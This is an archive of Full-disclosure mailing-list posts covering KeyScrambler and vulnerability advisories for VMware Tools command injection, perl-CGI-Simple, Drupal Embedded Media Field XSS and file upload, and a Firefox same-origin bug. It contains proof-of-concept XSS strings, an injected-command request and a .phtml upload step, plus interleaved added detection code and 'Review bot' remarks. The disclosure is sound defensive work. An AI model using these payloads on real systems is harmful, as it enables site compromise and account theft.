Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread mrx

On 08/12/2010 11:30, Tim Gurney wrote:
 Hi
 
 This seems to contradict itself somewhat. A plugin to firefox should
 have no way to encrypt things at a driver level within the kernel; that
 would require installing separate software at the root level. A plugin
 should not be able to do this and I would be VERY worried and surprised
 if it could, as it would mean bypassing the security of the OS.

I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3) 
environment and it is incompatible.
I may wait for an update to the plugin and analyse its behaviour, providing my 
curiosity doesn't wane in the meantime.

I am not a professional, I do this kind of research as a hobby and for 
educational purposes, when I have some free time.


 Also if the driver is encrypting the key strokes and the plugin is
 decrypting, what about all the keystrokes that are not in firefox, like
 email, word processing, programming? There is nothing to decrypt these,
 so you would end up only ever being able to use firefox on the machine
 and nothing else ever again.

The devs do state that it only encrypts keystrokes in Firefox and not other 
applications, although they do sell a version that supposedly works
in over 160 browsers and applications.
 
 Personally I would not touch this with a barge pole and I would do a lot
 more digging and checking into this.

Yes, I am sceptical of claims, hence the post to this list.



 regards
 
 Tim


Thanks for your input
Dave.


 
 On 08/12/10 11:12, mrx wrote:
 Hi list,
 
 Is anyone familiar with the firefox addon KeyScrambler? According to 
 developers this encrypts keystrokes.
 
 Quote:
 How KeyScrambler Works:
 When you type on your keyboard, the keys travel along a path within the 
 operating system before it arrives at your browser. Keyloggers plant
 themselves along this path and observe and record your keystrokes. The 
 collected information is then sent to the criminals who will use it to
 steal from you.
 
 KeyScrambler defeats keyloggers by encrypting your keystrokes at the 
 keyboard driver level, deep within the operating system. When the encrypted
 keystrokes reach your browser, KeyScrambler then decrypts them so you see 
 exactly the keys you've typed. Keyloggers can only record the
 encrypted keys, which are completely indecipherable.
 
 Can this be trusted? As in trusted I mean not bypassed.
 
 Input from the professionals on this list would be much appreciated.
 
 Thank you
 regards
 Dave
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk



Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Christian Sciberras
 I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3)
environment and it is incompatible.
 I may wait for an update to the plugin and analyse its behaviour,
providing my curiosity doesn't wane in the meantime.

Alternatively, you can just decompress the XPI (it's in fact a zip) and
inspect the js files and/or decompress any binaries.
I suppose they are distributing some form of driver, so you'd find
IDA/ollydbg useful.



Chris.




Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread mrx

On 08/12/2010 13:40, Julien Reveret wrote:

 Hi list,

 Is anyone familiar with the firefox addon KeyScrambler? According to
 developers this encrypts keystrokes.

 
 What if the attacker uses a firefox plugin such as ffsniff[1] to get the user's
 credentials?
 As Dan said, I guess this plugin will only fool some keyloggers, but not all.
 
 [1] http://azurit.elbiahosting.sk/ffsniff/
 

Thanks for the link.

Looking through the code of ffsniff was an eye opener.
I would hope that such an addon would be instantly recognised as malicious by 
Mozilla.
I am a curious hobbyist and pretty much a noob when compared to real 
professionals.
Perhaps in five years or so I might actually be able to contribute to the 
community :-)

Thanks for your response

regards
Dave


Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread mrx

On 09/12/2010 10:26, Christian Sciberras wrote:
 I tried installing this plugin to Firefox 3.6.12 in a virtualbox XP32(SP3)
 environment and it is incompatible.
 I may wait for an update to the plugin and analyse its behaviour,
 providing my curiosity doesn't wane in the meantime.
 
 Alternatively, you can just decompress the XPI (it's in fact a zip) and
 inspect the js files and/or decompress any binaries.
 I suppose they are distributing some form of driver, so you'd find
 IDA/ollydbg useful.
 
 
 
 Chris.
 

I extracted the files (various .js files and an exe) from the xpi.
The .js files version check and create an instance of keyscrambler.sys with the 
current firefox window passed to it as an argument.

I also extracted the contents of the executable, setup.exe.
Setup.exe contained various DLLs and one sys file. I presumed this sys file, 
keyscrambler.sys, is the driver and main component of this addon.
To confirm, I monitored the running of setup.exe.

My presumption was correct: keyscrambler.sys is installed in the system32 folder and 
is registered as an autostarting service, although it is hidden
from the services pane in computer management.

This is where my skills bottom out. ASM is something I have not yet got my 
head around.
I have a clue, but that's about all I do have... in time ;-)

Thanks for your advice and input
regards
Dave

 


-- 
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk

Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Christian Sciberras
Dave,

That's ok. Glad to have helped out :)

Cheers,
Chris.




Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Gary Baribault
Call me paranoid, but that sure would be a good way to spread a key logger!

Gary B


[Full-disclosure] Bonsai Information Security - VMware Tools update OS Command Injection

2010-12-09 Thread Bonsai Information Security Advisories
VMware Tools update OS Command Injection


1. Advisory Information
Advisory ID: BONSAI-2010-0110
Date published: Thu Dec 9, 2010
Vendors contacted: VMware
Release mode: Coordinated release

2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-4297

3. Software Description
VMware Tools is a suite of utilities that enhances the performance of
the virtual machine's guest operating system and improves management of
the virtual machine. Without VMware Tools installed in your guest
operating system, guest performance lacks important functionality.
Installing VMware Tools eliminates or improves the following issues:

* low video resolution
* inadequate color depth
* incorrect display of network speed
* restricted movement of the mouse
* inability to copy and paste and drag-and-drop files
* missing sound

VMware Tools includes these components:

* VMware Tools service
* VMware device drivers
* VMware user process
* VMware Tools control panel

VMware Tools is provided in the following formats:

* ISOs (contain .tar and .rpm files) – packaged with the product and
are installed in a number of ways, depending upon the VMware product and
the guest operating system installed in the virtual machine. VMware
Tools provides a different ISO file for each type of supported guest
operating system: Windows, Linux, NetWare, Solaris, and FreeBSD.
* Operating System Specific Packages (OSPs) – downloaded and
installed from the command line. VMware Tools is available as separate
downloadable, light-weight packages that are specific to each supported
Linux operating system and VMware product. OSPs are an alternative to
the existing mechanism for installing VMware Tools and only support
Linux systems running on ESX.

4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.

5. Vulnerable packages
Column 4 of the following table lists the action required to remediate
the vulnerability in each release, if a solution is available:
VMware Product   Product Version   Running On   Replace with / Apply Patch
VirtualCenter    any               Windows      not affected
Workstation      7.X               any          7.1.2 Build 301548 or later
Workstation      6.5.X             any          6.5.5 Build 328052 or later
Player           3.1.X             any          3.1.2 Build 301548 or later
Player           2.5.X             any          2.5.5 Build 328052 or later
AMS              any               any          not affected
Server           2.0.2             any          affected, no patch planned
Fusion           3.1.X             Mac OSX      3.1.2 Build 332101
Fusion           2.X               Mac OSX      2.0.8 Build 328035
ESXi             4.1               ESXi         ESXi410-201010402-BG
ESXi             4.0               ESXi         ESXi400-201009402-BG
ESXi             3.5               ESXi         ESXe350-201008402-T-BG **
ESX              4.1               ESX          ESX410-201010405-BG
ESX              4.0               ESX          ESX400-201009401-SG
ESX              3.5               ESX          ESX350-201008409-BG **
ESX              3.0.3             ESX          not affected

  * hosted products are VMware Workstation, Player, ACE, Fusion.
  ** Non Windows-based guest systems on ESXi 3.5 and ESX 3.5 only:
     - Install the relevant ESX patch.
     - Manually upgrade tools in the virtual machine (virtual machine
       users will not be prompted to upgrade tools). Note the VI Client may
       not show that VMware Tools is out of date in the summary tab.
The full VMware advisory can be found at:
http://www.vmware.com/security/advisories/VMSA-2010-0018.html

6. Non-vulnerable packages
See above table.

7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).

8. Technical Description
8.1. OS Command Injection – PoC Example
CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
VMware Server Infrastructure Web Access is prone to a remote command
execution vulnerability because the software fails to adequately
sanitize user-supplied input.
When updating VMware Tools on a given guest virtual machine, a command
injection attack can be executed if specially crafted parameters are sent.
Successful attacks can compromise the affected guest virtual machine
with root privileges.
The following proof of concept is given. It was exploited in a GNU/Linux
guest with VMware Tools installed but not fully updated:
POST /ui/sb HTTP/1.1
[…]
Cookie: JSESSIONID=F78CCA7DD3CF4E2E82587B236660C9ED; user_name=vmuser;
l=http%3A%2F%2Flocalhost%3A80%2Fsdk
[…]
[{i:378,exec:/cmd/vm,args:[UpgradeTools_Task,{_i:VirtualMachine|960},;
INJECTED COMMAND HERE ;]}]
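As an added detection example (not part of the advisory and not VMware's code), the following Python scans Web Access request bodies of the /cmd/vm shape shown in the PoC above and flags shell metacharacters in the scalar arguments of a task call. The sample bodies are constructed; the quoteless form mirrors the advisory's rendering, and the pattern's tolerance of both quoted and unquoted keys is an assumption about the wire format.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Shell metacharacters that never belong in a VM-operation argument.
SHELL_META = (";", "|", "&", "`", "$(", "\n", ">", "<")

# Matches the /cmd/vm call shape from the advisory's PoC. The published body
# appears with its quotes stripped, so the pattern accepts keys and values
# with or without double quotes (assumption about the format).
CMD_RE = re.compile(
    r'"?i"?\s*:\s*(\d+).*?"?exec"?\s*:\s*"?/cmd/vm"?\s*,\s*'
    r'"?args"?\s*:\s*\[(.*)\]\s*\}\s*\]\s*$',
    re.S,
)
# Managed-object references such as {_i:VirtualMachine|960} legitimately
# contain '|', so they are removed before scanning for metacharacters.
OBJ_REF_RE = re.compile(r"\{[^{}]*\}")

# Constructed sample bodies (not captured traffic); the second mirrors the
# advisory's PoC with its placeholder payload kept as-is.
SAMPLE_BODIES = [
    "[{i:377,exec:/cmd/vm,args:[UpgradeTools_Task,{_i:VirtualMachine|960},]}]",
    "[{i:378,exec:/cmd/vm,args:[UpgradeTools_Task,{_i:VirtualMachine|960},"
    "; INJECTED COMMAND HERE ;]}]",
    '[{"i":379,"exec":"/cmd/vm","args":["UpgradeTools_Task",'
    '{"_i":"VirtualMachine|960"},"$(PLACEHOLDER)"]}]',
    "[{i:380,exec:/cmd/vm,args:[PowerOnVM_Task,{_i:VirtualMachine|960}]}]",
]


@dataclass
class Finding:
    request_id: int
    task: str
    metachars: List[str] = field(default_factory=list)
    matches_advisory: bool = False  # True for the UpgradeTools_Task case


def inspect_body(body: str) -> Optional[Finding]:
    """Return a Finding when a /cmd/vm request carries shell metacharacters in
    its scalar arguments, otherwise None."""
    m = CMD_RE.search(body)
    if not m:
        return None
    request_id, raw_args = int(m.group(1)), m.group(2)
    task, _, rest = raw_args.partition(",")
    task = task.strip().strip('"')
    scalar_args = OBJ_REF_RE.sub("", rest)
    hits = [mc for mc in SHELL_META if mc in scalar_args]
    if not hits:
        return None
    return Finding(request_id, task, hits, task == "UpgradeTools_Task")


def scan(bodies) -> List[Finding]:
    """Run inspect_body over a batch of request bodies (e.g. from a proxy log)."""
    return [f for f in (inspect_body(b) for b in bodies) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_BODIES):
        print(f"request {f.request_id}: {f.task} with {f.metachars} "
              f"(advisory pattern: {f.matches_advisory})")
```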


9. Report Timeline
• 2010-04-24 / Vulnerabilities were identified
• 2010-04-29 – 2010-12-02 / Multiple Contacts with Vendor
• 2010-12-09 / Vulnerability is Disclosed – PoC attached

10. About Bonsai
Bonsai is a company involved in providing professional computer
information security services. Currently a sound growth company, since
its foundation in 

[Full-disclosure] [ MDVSA-2010:250 ] perl-CGI-Simple

2010-12-09 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2010:250
 http://www.mandriva.com/security/
 ___

 Package : perl-CGI-Simple
 Date: December 9, 2010
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in perl-CGI-Simple:
 
 The multipart_init function in (1) CGI.pm before 3.50 and (2) Simple.pm
 in CGI::Simple 1.112 and earlier uses a hardcoded value of the MIME
 boundary string in multipart/x-mixed-replace content, which allows
 remote attackers to inject arbitrary HTTP headers and conduct HTTP
 response splitting attacks via crafted input that contains this value,
 a different vulnerability than CVE-2010-3172 (CVE-2010-2761).
 
 The updated packages have been patched to correct this issue.
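As an added illustration of the flaw and its fix (not CGI::Simple's or CGI.pm's own code), the following Python sketches multipart/x-mixed-replace output with a fixed boundary beside the same output with a per-response random boundary, and a small client-side parser that shows text containing the known boundary becoming a separate part carrying its own header. The boundary value, the function names and the crafted input are constructed for this example.

```python
import re
import secrets

CRLF = "\r\n"

# Constructed stand-in for the hardcoded boundary the advisory describes;
# the real constant used by CGI.pm/CGI::Simple is not quoted here.
HARDCODED_BOUNDARY = "------- =_aaaaaaaaaa0"


def multipart_init(boundary):
    """Response preamble for multipart/x-mixed-replace (server push)."""
    return (f'Content-Type: multipart/x-mixed-replace; boundary="{boundary}"{CRLF}'
            f"{CRLF}--{boundary}{CRLF}")


def multipart_part(content_type, body, boundary):
    """One pushed part, terminated by the delimiter that opens the next one."""
    return f"Content-Type: {content_type}{CRLF}{CRLF}{body}{CRLF}--{boundary}{CRLF}"


def parse_parts(response):
    """Client-side view: list of (headers, body) per part. Everything before
    the first blank line of a part is taken as that part's headers, which is
    exactly what makes injected text dangerous."""
    boundary = re.search(r'boundary="([^"]+)"', response).group(1)
    parts = []
    for chunk in response.split(f"--{boundary}{CRLF}")[1:]:
        if not chunk.strip():
            continue
        head, _, body = chunk.partition(CRLF + CRLF)
        headers = {}
        for line in head.split(CRLF):
            name, _, value = line.partition(":")
            headers[name.strip()] = value.strip()
        parts.append((headers, body))
    return parts


def push_vulnerable(user_text):
    """Unpatched behaviour: every response reuses one publicly known boundary."""
    return (multipart_init(HARDCODED_BOUNDARY)
            + multipart_part("text/html", user_text, HARDCODED_BOUNDARY))


def push_fixed(user_text, boundary=None):
    """Fresh unpredictable boundary per response; additionally refuse content
    that happens to contain it (the refusal is this example's own choice)."""
    boundary = boundary or secrets.token_hex(16)
    if boundary in user_text:
        raise ValueError("content contains the MIME boundary")
    return multipart_init(boundary) + multipart_part("text/html", user_text, boundary)


# Constructed crafted input: closes the current part with the known boundary
# and supplies its own header for the part that follows.
CRAFTED = ("hello" + CRLF + "--" + HARDCODED_BOUNDARY + CRLF
           + "X-Injected: 1" + CRLF + CRLF + "<p>attacker-controlled part</p>")


if __name__ == "__main__":
    print(parse_parts(push_vulnerable(CRAFTED)))  # two parts, second carries X-Injected
    print(parse_parts(push_fixed(CRAFTED)))       # one part, crafted text stays in the body
```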
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2761
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
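The boundary problem the advisory above describes, as an added example that is not CGI::Simple's code: a minimal multipart/x-mixed-replace writer with a hardcoded boundary, a parser showing what a consumer of the stream sees, and the hardened form with a per-response random boundary. The boundary string and the hostile input are constructed stand-ins, not the module's real values.

```python
"""Fixed vs. unpredictable MIME boundaries in multipart/x-mixed-replace."""
import secrets

CRLF = "\r\n"

# Constructed stand-in for a boundary hardcoded in the module (the
# affected module's real value is deliberately not reproduced here).
FIXED_BOUNDARY = "------- =_aaaaaaaaaa0"

# Constructed user-controlled text.  A line equal to the boundary
# terminates the current part, and whatever follows is parsed as the
# next part's headers.  A harmless marker header stands in for the
# "arbitrary HTTP headers" the advisory refers to.
HOSTILE_TEXT = (
    "hello" + CRLF
    + "--" + FIXED_BOUNDARY + CRLF
    + "X-Injected: demo" + CRLF + CRLF
    + "second body the server never intended to send"
)


def push_part(body: str, boundary: str, content_type: str = "text/plain") -> str:
    """Serialise one part of a server-push stream."""
    return (
        f"--{boundary}{CRLF}"
        f"Content-Type: {content_type}{CRLF}{CRLF}"
        f"{body}{CRLF}"
    )


def push_part_vulnerable(body: str) -> str:
    """The pattern the advisory describes: a boundary hardcoded in the module."""
    return push_part(body, FIXED_BOUNDARY)


def new_boundary() -> str:
    """128 bits from the OS CSPRNG; generated once per response."""
    return "----=_" + secrets.token_hex(16)


def push_part_hardened(body: str, boundary: str) -> str:
    """Random boundary, plus a defensive refusal if the body contains it.

    With an unpredictable boundary the body cannot contain it by
    construction; the check guards against a boundary that leaked or
    was reused across responses.
    """
    if boundary in body:
        raise ValueError("body contains the MIME boundary")
    return push_part(body, boundary)


def hardened_rejects(body: str, boundary: str) -> bool:
    """True if the hardened writer refuses this body/boundary pair."""
    try:
        push_part_hardened(body, boundary)
    except ValueError:
        return True
    return False


def parse_parts(stream: str, boundary: str) -> list:
    """Split a stream into parts the way a consumer does.

    Each part becomes {"headers": {...}, "body": str} with header names
    lower-cased.  An injected boundary shows up as an extra part whose
    headers came from the user, which is the response-splitting effect.
    """
    parts = []
    for chunk in stream.split(f"--{boundary}{CRLF}")[1:]:
        header_block, _, body = chunk.partition(CRLF + CRLF)
        headers = {}
        for line in header_block.split(CRLF):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "body": body.rstrip(CRLF)})
    return parts


def demo() -> dict:
    """Run both writers on HOSTILE_TEXT and report what a consumer sees."""
    vuln_parts = parse_parts(push_part_vulnerable(HOSTILE_TEXT), FIXED_BOUNDARY)
    boundary = new_boundary()
    safe_parts = parse_parts(push_part_hardened(HOSTILE_TEXT, boundary), boundary)
    return {
        "vulnerable_part_count": len(vuln_parts),
        "injected_header_seen": "x-injected" in vuln_parts[-1]["headers"],
        "hardened_part_count": len(safe_parts),
        "hardened_body_intact": safe_parts[0]["body"] == HOSTILE_TEXT,
    }


if __name__ == "__main__":
    print(demo())
```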


[Full-disclosure] Drupal Embedded Media Field XSS (Emaudio Contrib)

2010-12-09 Thread Justin Klein Keane

Details of this disclosure are also available at
http://www.madirish.net/?article=472


Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Drupal Embedded Media Field module
(http://drupal.org/project/emfield) will create fields for content
types that can be used to display video, image, and audio files from
various third party providers. Unfortunately the Embedded Media Field
module contains an arbitrary HTML injection vulnerability (also known as
cross site scripting, or XSS) due to the fact that it fails to sanitize
user supplied audio file paths and custom embed code.

Systems affected:
- -
Drupal 6.19 with Embedded Media Field 6.x-1.25 and CCK 6.x-2.8 was
tested and shown to be vulnerable

Impact
- --
Users could inject arbitrary scripts into pages affecting other site
users.  This could result in administrative account compromise leading
to web server process compromise.  A more likely scenario would be for
an attacker to inject hidden content (such as iframes, applets, or
embedded objects) that would attack client browsers in an attempt to
compromise site users' machines.  This vulnerability could also be used
to launch cross site request forgery (XSRF) attacks against the site
that could have other unexpected consequences.

Mitigating factors:
- ---
In order to exploit this vulnerability the attacker must have the
ability to edit content of a content type with an embedded media field.

Proof of concept:
- -
1.  Install Drupal 6.19, CCK module, and Embedded Media Field module
version 6.x-1.25
2.  Enable the Content, Embedded Media Field, Embedded Audio Field
modules from ?q=/admin/build/modules
3.  Alter the default 'Story' content type at
?q=admin/content/node-type/story/fields
4.  Add a 'New Field' in the form at the bottom of this page with the
label 'audio' the field name 'field_audio' the type 'Embedded Audio' and
the form element '3rd Party Audio' then click the 'Save' button
5.  Configure the new video field from
?q=admin/content/node-type/story/fields/field_video
6.  Select all content providers for convenience and click 'Save field
settings' button at the bottom of the form
7.  Create a new piece of story content from ?q=node/add/story entering
arbitrary values.
8.  Enter '/scriptalert('xss');/scriptembed
onshow='alert(foo);'
src='http://traffic.libsyn.com/pauldotcom/PaulDotCom-SW-217pt2.mp3; in
the 'audio:' text field
9.  Click the 'Save' and observe the rendered JavaScript alert whenever
the node is displayed

Patch:
- --
Applying the following patch mitigates this issue in version 6.x-1.25

- --- emfield/contrib/emaudio/providers/custom_url.inc  2009-06-26
14:31:00.0 -0400
+++ emfield/contrib/emaudio/providers/custom_url.inc2010-11-05
15:17:08.0 -0400
@@ -110,6 +110,7 @@ function emaudio_custom_url_rss($item, $
 }

 function theme_emaudio_custom_url_flash($url = NULL, $width = 0,
$height = 0, $field = NULL, $data = array(), $node = NULL, $autoplay =
FALSE) {
+  $url=str_replace(', '', $url);  //this should be a URL validator
instead
   // Display the audio using Flowplayer if it's available.
   if (module_exists('flowplayer')) {
 $config = array(
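
Review bot: the added line `$url=str_replace(', '', $url);` strips one character from the URL and nothing else (as reproduced in this mail the character being removed appears to have been lost in transit), and the trailing comment `//this should be a URL validator instead` concedes the point: the function goes on to build the Flowplayer configuration from `$url`, and a value carrying quotes, angle brackets or a non-http scheme reaches it otherwise intact. Validate the field as an absolute http(s) URL before use (Drupal 6 offers `valid_url($url, TRUE)` for the check and `check_url()` for output) and drop or reject the value on failure instead of patching characters out. Minor style point: the new line omits the spaces around `=` and after `//` that the rest of the function uses.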

Vendor Response
- ---
http://drupal.org/node/992924


- -- 
Justin Klein Keane
http://www.MadIrish.net

The digital signature on this message can be confirmed using
the public key at http://www.madirish.net/gpgkey



[Full-disclosure] Drupal Embedded Media Field Module XSS Vuln

2010-12-09 Thread Justin Klein Keane

Details of this disclosure can also be found at
http://www.madirish.net/?article=474

Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Drupal Embedded Media Field module
(http://drupal.org/project/emfield) will create fields for content
types that can be used to display video, image, and audio files from
various third party providers. Unfortunately the Embedded Media Field
module contains an arbitrary HTML injection vulnerability (also known as
cross site scripting, or XSS) due to the fact that it fails to sanitize
filenames of thumbnail images before display.

Systems affected:
- -
Drupal 6.19 with Embedded Media Field 6.x-1.25 and CCK 6.x-2.8 was
tested and shown to be vulnerable

Impact
- --
Users could inject arbitrary scripts into pages affecting other site
users.  This could result in administrative account compromise leading
to web server process compromise.  A more likely scenario would be for
an attacker to inject hidden content (such as iframes, applets, or
embedded objects) that would attack client browsers in an attempt to
compromise site users' machines.  This vulnerability could also be used
to launch cross site request forgery (XSRF) attacks against the site
that could have other unexpected consequences.

Mitigating factors:
- ---
In order to exploit this vulnerability the attacker must have the
ability to edit content of a content type with an embedded media field.
 Also, many operating systems prevent the creation of files with slashes
in their names so clever use of scripting without slashes is required to
exploit this vulnerability.

Proof of concept:
- -
1.  Install Drupal 6.19, CCK module, and Embedded Media Field module
version 6.x-1.25
2.  Enable the Content, Embedded Media Field, Embedded Media Thumbnail
and Embedded Video Field modules from ?q=/admin/build/modules
3.  Alter the default 'Story' content type at
?q=admin/content/node-type/story/fields
4.  Add a 'New Field' in the form at the bottom of this page with the
label 'video' the field name 'field_video' the type 'Embedded Video' and
the form element '3rd Party Video' then click the 'Save' button
5.  Configure the new video field from
?q=admin/content/node-type/story/fields/field_video
6.  Select YouTube as a content provider for convenience and be sure
'Allow custom thumbnails for this field' is checked and click 'Save
field settings' button at the bottom of the form
7.  Create a new piece of story content from ?q=node/add/story entering
arbitrary values.  For the 'Video custom thumbnail' choose an image with
a name like image src='no.jpg' onerror='alert(xss)'.png and click
the 'Upload' button
8.  Observe the rendered javascript alert dialogue
9.  Click the 'Save' button so that the XSS persists to future node edits

Patch:
- --
Applying the following patch mitigates this issue in version 6.x-1.25

- --- emfield/contrib/emthumb/emthumb.module2010-07-19 11:12:47.0
- -0400
+++ emfield/contrib/emthumb/emthumb.module  2010-11-04 16:10:48.0
- -0400
@@ -157,7 +157,7 @@ function emthumb_widget_element_process(

 $element['emthumb']['description'] = array(
   '#type' = 'markup',
- -  '#value' = 'strong'. t('Filename:') .' /strong'.
$file['filename'],
+  '#value' = 'strong'. t('Filename:') .' /strong'.
check_plain($file['filename']),
 );

 // Overwrite with an input field if custom_alt is flagged.
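
Review bot: wrapping `$file['filename']` in `check_plain()` is the right fix at this line, because the element is declared `'#type' = 'markup'` directly above and a markup element is rendered verbatim, so this `#value` is the last point at which escaping can happen. Two follow-ups: the filename is stored and, per step 9 of the PoC, re-rendered on every later edit, so every other place the module prints `$file['filename']` into markup needs the same treatment or the stored value stays live; and the neighbouring advisory on this page shows the same custom-thumbnail upload accepting arbitrary names and extensions, so the filename should also be validated when the file is accepted rather than relying on output escaping alone. Note also that the `- -` prefix on the removed line is a PGP clearsign artifact of the mail, not part of the patch, and must be undone before the diff applies.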

Vendor Response
- ---
http://drupal.org/node/992924


- -- 
Justin Klein Keane
http://www.MadIrish.net

The digital signature on this message can be confirmed using
the public key at http://www.madirish.net/gpgkey



[Full-disclosure] Drupal Embedded Media Field Module Arbitrary File Upload and Code Exec Vulnerability

2010-12-09 Thread Justin Klein Keane

Details of this disclosure can also be found at
http://www.madirish.net/?article=473

Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Drupal Embedded Media Field module
(http://drupal.org/project/emfield) will create fields for content
types that can be used to display video, image, and audio files from
various third party providers. Unfortunately the Embedded Media Field
module contains a vulnerability that could allow arbitrary file upload
and potentially code execution.  The proof of concept and patch detailed
below only cover the upload of an image directly to the server, but a
remotely sourced image could also be used to exploit this vulnerability.

Systems affected:
- -
Drupal 6.19 with Embedded Media Field 6.x-1.25 and CCK 6.x-2.8 was
tested and shown to be vulnerable

Impact
- --
Malicious users can upload arbitrary files with extensions other than
.php, .pl, .py, .cgi, .asp, or .js.  Many web servers support legacy PHP
extensions not included in this list (such as .phtml, or .php3) which
would allow attackers to upload and execute arbitrary PHP code.
Attackers could also upload malicious documents or other material with
virus payload and use these to attack other users or exploit flaws in
file include vulnerabilities.

Mitigating factors:
- ---
In order to exploit this vulnerability the attacker must have the
ability to edit or create content of a content type with an embedded
media field and custom thumbnail.

Proof of concept:
- -
1.  Install Drupal 6.19, CCK module, and Embedded Media Field module
version 6.x-1.25
2.  Enable the Content, Embedded Media Field, Embedded Audio Field, and
Embedded Media Thumbnail modules from ?q=/admin/build/modules
3.  Alter the default 'Story' content type at
?q=admin/content/node-type/story/fields
4.  Add a 'New Field' in the form at the bottom of this page with the
label 'audio' the field name 'field_audio' the type 'Embedded Audio' and
the form element '3rd Party Audio' then click the 'Save' button
5.  Configure the new video field from
?q=admin/content/node-type/story/fields/field_video
6.  Select all content providers for convenience, ensure the 'Allow
custom thumbnails for this field' checkbox is checked and click 'Save
field settings' button at the bottom of the form
7.  Create a new piece of story content from ?q=node/add/story entering
arbitrary values.
8.  Upload a test file called test.phtml as the custom image thumbnail.
9.  Click the 'Upload' button
10.  Although an error is displayed, the file is still uploaded and
available at sites/default/files/test.phtml by default

Vendor Response
- 
http://drupal.org/node/992924


- -- 
Justin Klein Keane
http://www.MadIrish.net

The digital signature on this message can be confirmed using
the public key at http://www.madirish.net/gpgkey

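The extension policy described in the Impact section above, as an added example rather than the module's own code: the denylist the advisory names beside an allowlist that also checks the file's leading bytes, which is what a thumbnail upload actually needs. The sample file names and contents are constructed.

```python
"""Extension denylist vs. allowlist with a content check for thumbnail uploads."""
import os

# The denylist the advisory says the upload enforces: anything not in
# this set is accepted, which is how test.phtml gets through.
DENYLIST = {".php", ".pl", ".py", ".cgi", ".asp", ".js"}

# What a thumbnail field actually needs: a short allowlist of image
# types, each tied to the bytes that format starts with.
IMAGE_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def extension_of(filename: str) -> str:
    """Lower-cased final extension, e.g. 'photo.PNG' -> '.png'."""
    return os.path.splitext(filename)[1].lower()


def denylist_accepts(filename: str) -> bool:
    """The vulnerable policy: allowed unless the extension is listed."""
    return extension_of(filename) not in DENYLIST


def allowlist_accepts(filename: str, head: bytes) -> bool:
    """Hardened policy: a known image extension AND matching leading bytes.

    Checking content as well as the name rejects script source that has
    merely been renamed with an image extension.  This complements, and
    does not replace, configuring the web server not to execute anything
    under the upload directory.
    """
    sig = IMAGE_SIGNATURES.get(extension_of(filename))
    return sig is not None and head.startswith(sig)


def evaluate(uploads) -> dict:
    """Run both policies over (filename, leading bytes) pairs."""
    return {
        name: {
            "denylist": denylist_accepts(name),
            "allowlist": allowlist_accepts(name, head),
        }
        for name, head in uploads
    }


# Constructed sample uploads: the advisory's test.phtml, a legacy PHP
# extension, a genuine PNG header, a listed extension, and PHP source
# renamed to look like an image.
SAMPLE_UPLOADS = [
    ("test.phtml", b"<?php echo 1; ?>"),
    ("test.php3", b"<?php echo 1; ?>"),
    ("photo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    ("photo.png.php", b"\x89PNG\r\n\x1a\n"),
    ("renamed.png", b"<?php echo 1; ?>"),
]


if __name__ == "__main__":
    for name, verdicts in evaluate(SAMPLE_UPLOADS).items():
        print(f"{name:16} denylist={verdicts['denylist']!s:5} "
              f"allowlist={verdicts['allowlist']}")
```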


[Full-disclosure] Firefox 3.6.13 pseudo-URL SOP check bug (CVE-2010-3774)

2010-12-09 Thread Michal Zalewski
Hi folks,

Firefox 3.6.13 fixes an interesting bug in their same-origin policy
logic for pseudo-URLs that do not have any inherent origin associated
with them. These documents are normally expected to inherit the
context from their parent, or be assigned a unique one. This didn't
work as expected in Firefox, apparently due to a code refactoring in
2008. The vulnerability permits malicious websites to access and
modify the contents of special pages such as about:neterror or
about:config, which has consequences ranging from content spoofing to
complete subversion of the browser security model.

More info: 
